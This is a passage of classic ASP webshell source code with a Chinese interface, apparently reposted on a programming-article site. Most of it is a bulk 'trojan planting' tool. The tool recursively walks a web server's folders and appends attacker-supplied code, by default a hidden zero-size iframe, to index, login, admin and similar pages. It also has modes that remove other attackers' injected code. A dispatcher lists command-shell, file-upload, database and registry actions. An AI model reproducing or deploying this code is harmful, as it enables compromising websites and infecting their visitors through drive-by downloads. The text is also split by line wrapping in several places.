    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移動'>移動</a>"    
                Report = Report&"<tr><td 
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
                    Report = 
Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
                    Sun = Sun + 1
                    Exit Sub
                End If
                ofile.close()
                Set ofile = Nothing
                Set FSO2s = Nothing
            Else
                temp = "<a 
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)
&"</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='編輯'>編輯</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")' 
 onclick='return yesok()' class='am' title='刪除'>刪除</a > "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='復制'>復制</a> "
    temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移動'>移動</a>"    
                Report = Report&"<tr><td 
height=30>"&temp&"</td><td>"&GetDateCreate(thePath)
&"</td><td>"&theDate&"</td></tr>"
                Sun = Sun + 1
                Exit Sub
            End If
        End If
    Next
End Sub

  Case "plgm"
Server.ScriptTimeout=1000000 
Response.Buffer=False 
RRS ("<b>當前網站絕對路徑:")&Server.MapPath("/")&("</b>")
ASP_SELF=Request.ServerVariables("PATH_INFO") 
s=Request("fd") 
if s="" then s=Server.MapPath("/")
ex=Request("ex") 
pth=Request("pth") 
newcnt=Request("newcnt") 
addcode = Request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0 
height=0></iframe>"
If ex<>"" AND pth<>"" Then 
select Case ex 
Case "edit" 
CALL file_show(pth) 
Case "save" 
CALL file_save(pth) 
End select 
Else 
RRS("<form method=""POST""> ")
RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
RRS("<tr>")
RRS("<td width=""102"">要掛馬文件夾的絕對路徑:</td>")
RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&""" 
size=60></td>")
RRS("<td width=""69""> </td>")
RRS("</tr><tr><td>要掛馬的代碼:</td>")
RRS("<td><textarea name=""code"" cols=58 
rows=""3"">"&addcode&"</textarea></td>")
RRS("<td><input name=""submit"" type=""submit"" value=""開始""></td>")
RRS("</tr></table></form> ")
End If 
Function IsPattern(patt,str) 
Set regEx=New RegExp 
regEx.Pattern=patt 
regEx.IgnoreCase=True 
retVal=regEx.Test(str) 
Set regEx=Nothing 
If retVal=True Then 
IsPattern=True 
Else 
IsPattern=False 
End If 
End Function 
if request.form("submit")<>"" then
If s="" or addcode="" Then
RRS "<font color=red>請輸入掛馬的路徑或代碼!</font>"
response.end
else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s 
End If
end if 
Sub sch(s) 
oN eRrOr rEsUmE nExT 
Set fs=Server.createObject("Scripting.FileSystemObject") 
Set fd=fs.GetFolder(s) 
Set fi=fd.Files 
Set sf=fd.SubFolders 
For Each f in fi 
rtn=f.path 
step_all rtn 
Next 
If sf.Count<>0 Then 
For Each l In sf 
sch l 
Next 
End If 
End Sub 
Sub step_all(agr) 
retVal=IsPattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr) 
If retVal Then 
step1 agr 
step2 agr 
Else 
Exit Sub 
End If 
End Sub 
Sub step1(str1)
RRS "<div style='line-height:20px'>√ "&str1&" _"
RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DownFile"")' class='am' title='下載'>下載</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""EditFile"")' class='am' title='編輯'>編輯</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'onclick='return yesok()' class='am' title='刪除'>刪除
</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""CopyFile"")' class='am' title='復制'>復制</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""MoveFile"")' class='am' title='移動'>移動</a></div>"
End Sub 
Sub step2(str2) 
Set fs=Server.createObject("Scripting.FileSystemObject") 
isExist=fs.FileExists(str2) 
If isExist Then 
Set f=fs.GetFile(str2) 
Set f_addcode=f.OpenAsTextStream(8,-2) 
if left(right(str2,8),4)="conn" then
f_addcode.Write
else
f_addcode.Write addcode 
f_addcode.Close 
Set f=Nothing 
End If 
end if
Set fs=Nothing 
End Sub 
Err.Clear
  Case "Cplgm"
    Fpath=Request("fd")
    addcode = Request("code")
    addcode2 = Request("code2")
    pcfile=request("pcfile")
    checkbox=request("checkbox")
    ShowMsg=request("ShowMsg")
    FType=request("FType")
    M=request("M")
    if Ftype="" then 
Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
    if Fpath="\" then Fpath=Server.MapPath("\")
    if Fpath="." or Fpath="" then Fpath=Server.MapPath("/")    
    if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm 
width=0 height=0></iframe>"
    if checkbox="" then checkbox=request("checkbox")
    if pcfile="" then
        pcfileName=Request.ServerVariables("SCRIPT_NAME")
        pcfilek=split(pcfileName,"/") 
        pcfilen=ubound(pcfilek) 
        pcfile=pcfilek(pcfilen) 
    end if
      RRS ("<b>網站根目錄</b>- "&Server.MapPath("/")&"<br>")
    RRS ("<b>本程序目錄</b>- "&Server.MapPath("."))
    RRS "<form method=POST><div style='color:#3399ff'><b>[" 
    if M="1" then RRS"批量掛馬器-批量掛馬"
    if M="2" then RRS"批量清馬器-清除別人的網馬"
    if M="3" then RRS"批量替換器-文件替換修改工具"
    if M="" then response.end
    RRS "]</b></div><table width=100% border=0><tr><td>文件路徑:
</td>"
    RRS "<td><input type=text name=fd value=""\"" size=40> 填“\”
即網站根目錄;“.”為程序所在目錄</td></tr>"
    if M="1" then RRS "<tr><td>過濾重復:</td><td><input class=c 
name='checkbox' checked='checked' type=checkbox value=""checked"" 
"&checkbox&"> 防止一個頁面中有多個重復的代碼</td></tr>"

    RRS "<tr><td>排除文件:</td>"
    RRS "<td><input name='pcfile' type=text id='pcfile' 
value='"&pcfile&"' size=40> 輸入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
    RRS "<tr><td>文件類型:</td>"
    RRS "<td><input name='FType' type=text id='FType' 
value='"&Ftype&"' size=40> 輸入要修改的文件類型[擴展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
    if M="1" then RRS"要掛的馬:"
    if M="2" then RRS"要清的馬:"
    if M="3" then RRS"查找內容:"
    RRS"</font></td><td><textarea name=code cols=66 
rows=3>"&addcode&"</textarea></td></tr>"
    if M="3" then RRS "<tr><td><font color=#3399ff>替 換 為:
</font></td><td><textarea name=code2 cols=66 
rows=3>"&addcode&"</textarea></td></tr>"
    RRS "<tr><td></td><td> <input name=submit type=submit value=開
始執行> --標記解釋--[成功:√ , 排除:× , 重復:<font color=red>×
</font>]</td></tr>"
    RRS "</table></form>" 
if request("submit")="開始執行" then 
RRS"<div style='line-height:25px'><b>執行記錄:</b><br>"
call InsertAllFiles(Fpath,addcode,pcfile)
RRS"</div>"
end if
Sub InsertAllFiles(Wpath,Wcode,pc)
    Server.ScriptTimeout=999999999
     if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
     Set WFSO = CreateObject("Scripting.FileSystemObject")
     on error resume next 
     Set f = WFSO.GetFolder(Wpath)
     Set fc2 = f.files
     For Each myfile in fc2
        Set FS1 = CreateObject("Scripting.FileSystemObject")
        FType1=split(myfile.name,".") 
        FType2=ubound(FType1) 
        if Ftype2>0 then
        FType3=LCase(FType1(FType2)) 
        else
        FType3="無"
        end if
        if Instr(LCase(pc),LCase(myfile.name))=0 and Instr
(LCase(FType),FType3)<>0 then
            select case M
                case "1"
                    if checkbox<>"checked" then
                        Set 
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
                    if left(myfile.name,4)="conn" 
then
                        tfile.Write
                        RRS"√  
"&Wpath&myfile.name
                        else
                        tfile.writeline Wcode
                        RRS"√ 
"&Wpath&myfile.name
                        tfile.close
                    end if
                    end if    
                    if checkbox="checked" then
                        Set 
tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
                        if Instr
(tfile1.readall,Wcode)=0 then
                            Set 
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
                        if left(myfile.name,4)
="conn" then
                        tfile.Write
                        RRS"× 
"&Wpath&myfile.name
                        else
                        tfile.writeline Wcode
                            RRS"√  
"&Wpath&myfile.name
                            tfile1.close
                        end if    
                        else
                            RRS"<font 
color=red>×</font> "&Wpath&myfile.name
                            tfile1.close
                        end if
                        Set tfile1=Nothing
                    end if
                case "2"
                    Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
                    NewCode=Replace
(tfile1.readall,Wcode,"")
                    Set 
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
                    objCountFile.Write NewCode
                    objCountFile.Close
                    RRS"√  "&Wpath&myfile.name
                    Set objCountFile=Nothing
                case "3"
                    Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
                    NewCode=Replace
(tfile1.readall,Wcode,addCode2)
                    Set 
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
                    objCountFile.Write NewCode
                    objCountFile.Close
                    RRS"√  "&Wpath&myfile.name
                    Set objCountFile=Nothing
                case else
                    RRS"大哥,別亂來.":response.end
            end select
        else
            RRS"× "&Wpath&myfile.name
        end if
RRS " → <a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='下
載'>下載</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='編
輯'>編輯</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'  onclick='return yesok()' class='am' title='刪除'>刪
除</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='復
制'>復制</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='移
動'>移動</a><br>"
     Next
 Set fsubfolers = f.SubFolders
 For Each f1 in fsubfolers
    NewPath=Wpath&""&f1.name
     InsertAllFiles NewPath,Wcode,pc
 Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
End Sub
  Case "ReadREG":call ReadREG()
  Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session
("FolderPath")):Set ABC=Nothing
  Case "DownFile":DownFile FName:ShowErr()
  Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
  Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
  Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
  Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
  Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
  Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set 
ABC=Nothing
  Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set 
ABC=Nothing
  Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
  Case "UpFile":UpFile()
  Case "Cmd1Shell":Cmd1Shell()
  Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect 
URL
  Case "DbManager":DbManager()
  Case "Course":Course()
  Case "ServerInfo":ServerInfo()
  Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()
RRS"</body></html>"
%>
打包文件下載
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved